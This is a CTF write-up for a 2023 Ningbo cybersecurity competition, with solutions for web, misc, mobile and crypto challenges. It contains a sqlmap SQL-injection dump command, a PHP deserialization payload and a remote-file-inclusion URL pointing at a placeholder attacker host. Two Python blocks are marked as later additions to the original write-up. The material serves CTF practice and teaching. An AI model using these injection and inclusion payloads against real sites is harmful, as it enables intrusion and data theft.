Tianyi Yong'an Cup Ningbo Cybersecurity Competition (天一永安杯宁波市网络安全大赛) 2023 Writeup

Since travel to the on-site final wasn't reimbursed, I just played casually (absolutely not because I couldn't qualify for the final! 😫)

Web

Query

Query suitable data and get your flag.

```http
POST http://37a6852ac4faf290.node.nsctf.cn/login.php HTTP/1.1
Host: 37a6852ac4faf290.node.nsctf.cn
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://37a6852ac4faf290.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://37a6852ac4faf290.node.nsctf.cn/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8lvsj65t588pem3sqkj1m24md6
Connection: close

username=1&password=*
```

Save the request to a file and let sqlmap do the rest:

```shell
python .\sqlmap.py -r post.txt -D 'ctf' -T 'f111' --dump
```

Deserialization

Construct your object

Viewing the page source reveals a code snippet: it expects $read and $input via POST, and $read must not contain f14g.

```php
<!--
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
    die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
    include($read);
    $input = unserialize($input);
    $input2 = clone $input;
    $input2->position = "route.php";
}
else{
    die("NONONO!");
}
-->
```


NONONO!

Following the known logic, build the request directly. First use the php://filter wrapper to read route.php:

```
read=php://filter/convert.base64-encode/resource=route.php&input=123
```

Decoding the result gives the file's source:

```php
<h1>Here can you find the position of the flag!</h1>

<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>
```

That file mentions h1nt.php, so read that next:

```php
<?php
class test
{
    public $position;
    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}
?>
```

The logic is simple: clone triggers __clone(), which reads whatever $position points at. Build the object accordingly:

```php
<?php
class test
{
    public $position;
}

$f = new test();
$f->position = 'f14g.php';
var_dump(serialize($f));
// O:4:"test":1:{s:8:"position";s:8:"f14g.php";}
```

Since the class must be defined for the unserialize and clone to trigger, read has to include h1nt.php. The final parameters are:

```
read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:8:"f14g.php";}
```
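As an added example (not code from the write-up), here is a small Python parser for PHP's serialize() format that returns the decoded value together with every class name a payload would instantiate. That is the check a defender wants to run, or have `unserialize($input, ['allowed_classes' => ...])` enforce, before untrusted input reaches unserialize(); the `allowed` names below are hypothetical.

```python
# Added example: parse PHP serialize() output (N, b, i, d, s, a, O tokens) and
# report the classes it would instantiate, so an allowlist can be applied first.
PAYLOAD = 'O:4:"test":1:{s:8:"position";s:8:"f14g.php";}'   # the payload from the write-up

def parse_php_serialized(data):
    """Return (value, [class names]) for a PHP-serialized string."""
    classes, pos = [], 0

    def read_until(ch):
        nonlocal pos
        end = data.index(ch, pos)
        token, pos = data[pos:end], end + 1
        return token

    def parse():
        nonlocal pos
        tag = data[pos]
        pos += 2                                    # skip the tag and ':' (or ';' for N)
        if tag == "N":
            return None
        if tag in "bid":
            raw = read_until(";")
            return {"b": lambda v: v == "1", "i": int, "d": float}[tag](raw)
        if tag == "s":
            length = int(read_until(":"))
            text = data[pos + 1:pos + 1 + length]   # skip the opening quote
            pos += length + 3                       # quote, text, quote, ';'
            return text
        if tag in "aO":
            name = None
            if tag == "O":
                read_until(":")                     # class-name length, not needed
                name = read_until(":")[1:-1]        # strip the quotes
                classes.append(name)
            count = int(read_until(":"))
            pos += 1                                # '{'
            items = {} if name is None else {"__class__": name}
            for _ in range(count):                  # key first, then its value
                key = parse()
                items[key] = parse()
            pos += 1                                # '}'
            return items
        raise ValueError("unsupported tag %r at offset %d" % (tag, pos - 2))

    return parse(), classes

def unexpected_classes(data, allowed=()):
    """Defender's gate: class names in the payload that are not on the allowlist."""
    _, classes = parse_php_serialized(data)
    return sorted(set(classes) - set(allowed))
```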

CodeCheck

Check this code!

The page source contains part of the code:

```php
<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->
```
NONONO

The logic is simple: the content fetched from a must equal "flag", and the content fetched from b must match c (both "flag" here). Remote file inclusion plus the php://filter wrapper does it:

```
http://e644ab7e50751e44.node.nsctf.cn/
?a=http://your_ip/1.txt
&b=http://your_ip/1.txt
&c=flag
&d=php://filter/convert.base64-encode/resource=index.php
```

The base64-decoded index.php:

```php
<!-- 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}-->
<?php
$flag = "flag{flag{a3722bcf95f64d05aab15a41a000fdfb}}";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
    var_dump($_GET['c']);
    var_dump(file_get_contents($_GET['b']));
    die("yes");
}
if(isset($_GET['d']))
{
    include($_GET['d']);
}
?>
```

Misc

zip

Simple Compress

Opening the attachment, the archive comment gives a hint:

```
The art of 0 and 1, and it will remain shorter than 9.
```

Generate every candidate with a script and brute-force the archive; the password is 01001101.

```python
import itertools

# The archive comment says the password uses only 0 and 1 and is shorter than 9
# characters, so write every binary string of length 1 to 8 into a wordlist.
digits = ['0', '1']

with open('pass.txt', 'w') as f:
    for length in range(1, 9):
        for combination in itertools.product(digits, repeat=length):
            f.write(''.join(combination) + '\n')
```

SimpleDocument

More than image.

Carve out the embedded PDF, select all and copy to get the flag (the flag is set in white text, so it is invisible by default).

BeautifulImage

Cool Mountain

LSB steganography: channel 0 holds a base64 string:

```
ZmxhZ3syNGVkZDc2ZTQ2YzIyYzY1Y2M1YmRkZDNjNmU0ZjZmM30=
```

Mobile

peacock

peacock

Stared at it in jadx for ages without a lead, so I decompiled the .so instead and found base64 with a custom alphabet; decoding it with that table gives the flag.


Crypto

secret

What a magical ciphertext!

```python
import gmpy2
import libnum

p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28

n = p * q
phi = (p - 1) * (q - 1)

# e is not coprime to phi, so e has no modular inverse. Split e = t * t1 with
# t = gcd(e, phi); t1 is coprime to phi here, so it can be inverted.
t = gmpy2.gcd(e, phi)
t1 = e // t
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)              # c^dt1 = (m^t)^(t1*dt1) = m^t mod n
print(mt1)
s, m = gmpy2.iroot(mt1, t)        # exact t-th root (valid because m^t < n); m is the is-exact flag
print(s)
print(libnum.n2s(int(s)))
```

Morse's Notebook

```
你知道吗。今天我竟然在街上捡到了100元钞票,我当时简直惊呆了,太幸运了。于是我赶紧把钞票捡起来!心里面十分高兴。走了一段路之后,我看见了一个老奶奶在街角卖菜!我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去!把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐!因为我知道。这个世界因为有我们每一个人的善良而变得更美好,今天天气真的很好,我和小丽!小明越好一起去公园玩,在公园里,我们看见了一只可爱的小松鼠,它在树枝上蹦来蹦去!十分活泼可爱。我们还看见了一些漂亮的花朵,它们在微风中轻轻摇曳。像在跳舞一样!我们一边走一边欣赏,一边笑一边玩。真是度过了一个美好的下午。回家的路上!我感到心情特别愉悦。因为我知道。只要心怀善意!天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐!人生路上,有时候你会遇到阻碍。但只要你努力地挑战,不放弃。就能突破困境!实现自己的梦想,所以,不管你遇到什么样的挑战,都不要气馁!坚持下去,你一定会收获成功的喜悦。因为!只有那些坚定自己方向的人,才能走得更远,更自信。当我们遭遇挫折和失败的时候!不要被打倒。要用心去学习,从失败中汲取经验教训。然后重新站起来!更加坚定地追求自己的目标。成功并不是一蹴而就的,需要我们付出长久的努力和坚持!但只要我们一直前进,终究会到达成功的彼岸!所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。

mesr{997a9k414dx8m4061u74v15m1y32201k}
```

Another guessy one. Notice that the only punctuation marks in the note are , . and !; combined with the challenge name, map them to Morse code:

```
.--. .- ... ... .-- --- .-. -.. .. ... -.-. --- -. --. .-. .- - ...
// PASSWORDISCONGRATS
```

Vigenère decryption (key CONGRATS) followed by Caesar decryption yields the flag.

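The whole chain as an added, runnable example (not code from the write-up): the note's punctuation is mapped to Morse, decoded to PASSWORDISCONGRATS, then the key after PASSWORDIS is used for Vigenère and the Caesar shift is found by trying all 26 and keeping the one that yields the flag{ prefix. The symbol mapping (。 = dot, , = dash, ! = letter gap) is inferred from the decoded result above; the full-width comma and exclamation mark are accepted too in case of copy variation.

```python
# Added example: punctuation -> Morse -> Vigenère key -> Caesar shift search.
NOTE = "你知道吗。今天我竟然在街上捡到了100元钞票,我当时简直惊呆了,太幸运了。于是我赶紧把钞票捡起来!心里面十分高兴。走了一段路之后,我看见了一个老奶奶在街角卖菜!我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去!把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐!因为我知道。这个世界因为有我们每一个人的善良而变得更美好,今天天气真的很好,我和小丽!小明越好一起去公园玩,在公园里,我们看见了一只可爱的小松鼠,它在树枝上蹦来蹦去!十分活泼可爱。我们还看见了一些漂亮的花朵,它们在微风中轻轻摇曳。像在跳舞一样!我们一边走一边欣赏,一边笑一边玩。真是度过了一个美好的下午。回家的路上!我感到心情特别愉悦。因为我知道。只要心怀善意!天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐!人生路上,有时候你会遇到阻碍。但只要你努力地挑战,不放弃。就能突破困境!实现自己的梦想,所以,不管你遇到什么样的挑战,都不要气馁!坚持下去,你一定会收获成功的喜悦。因为!只有那些坚定自己方向的人,才能走得更远,更自信。当我们遭遇挫折和失败的时候!不要被打倒。要用心去学习,从失败中汲取经验教训。然后重新站起来!更加坚定地追求自己的目标。成功并不是一蹴而就的,需要我们付出长久的努力和坚持!但只要我们一直前进,终究会到达成功的彼岸!所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。"
CIPHERTEXT = "mesr{997a9k414dx8m4061u74v15m1y32201k}"

MORSE = {".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F", "--.": "G",
         "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L", "--": "M", "-.": "N",
         "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T", "..-": "U",
         "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y", "--..": "Z"}

def punctuation_to_morse(text):
    """Keep only the three marks: 。 -> '.', comma -> '-', ! -> gap between letters."""
    symbols = {"。": ".", ",": "-", "，": "-", "!": " ", "！": " "}
    code = "".join(symbols.get(ch, "") for ch in text)
    return " ".join(code.split())          # normalises gaps and trims the ends

def morse_to_text(code):
    return "".join(MORSE[letter] for letter in code.split())

def shift_letters(text, offsets):
    """Subtract a cycling offset from each a-z letter; other characters pass through."""
    out, i = [], 0
    for ch in text:
        if ch.isalpha():
            out.append(chr((ord(ch.lower()) - 97 - offsets[i % len(offsets)]) % 26 + 97))
            i += 1                         # the key only advances on letters
        else:
            out.append(ch)
    return "".join(out)

def vigenere_decrypt(text, key):
    return shift_letters(text, [ord(k) - 65 for k in key.upper()])

def caesar_decrypt(text, shift):
    return shift_letters(text, [shift])

def solve(note=NOTE, ciphertext=CIPHERTEXT):
    """Return (vigenere key, caesar shift, plaintext); the shift is the one giving 'flag{'."""
    key = morse_to_text(punctuation_to_morse(note))[len("PASSWORDIS"):]
    after_vigenere = vigenere_decrypt(ciphertext, key)
    for shift in range(26):
        candidate = caesar_decrypt(after_vigenere, shift)
        if candidate.startswith("flag{"):
            return key, shift, candidate
    raise ValueError("no Caesar shift produced the flag format")
```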

rsa

What math did this one use?

```python
# Run under SageMath: PolynomialRing, Zmod and small_roots are Sage, not plain Python.
import gmpy2

n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439

# Coppersmith's method: find the small root x (< 2^60) of f(x) = 2*a*x + 1 over Z/nZ.
R = PolynomialRing(Zmod(n), 'x')
x = R.gen()
f = 2 * a * x + 1
f_monic = f.monic()          # small_roots() requires a monic polynomial

ans = f_monic.small_roots(X=2 ** 60, beta=0.4, epsilon=0.05)
g = ans[0]

# Decrypt with the recovered value: modulus a*g, phi = (a-1)*(g-1), e = 65537.
d = gmpy2.invert(gmpy2.mpz(65537), gmpy2.mpz((a - 1) * (g - 1)))
m = gmpy2.powmod(gmpy2.mpz(c), d, gmpy2.mpz(a * g))
plaintext = bytes.fromhex(hex(int(m))[2:])
print(plaintext)
```
Author: iami233
Link: https://5ime.cn/nb-infosec-2023.html
License: this article is licensed under CC BY-NC-SA 3.0 CN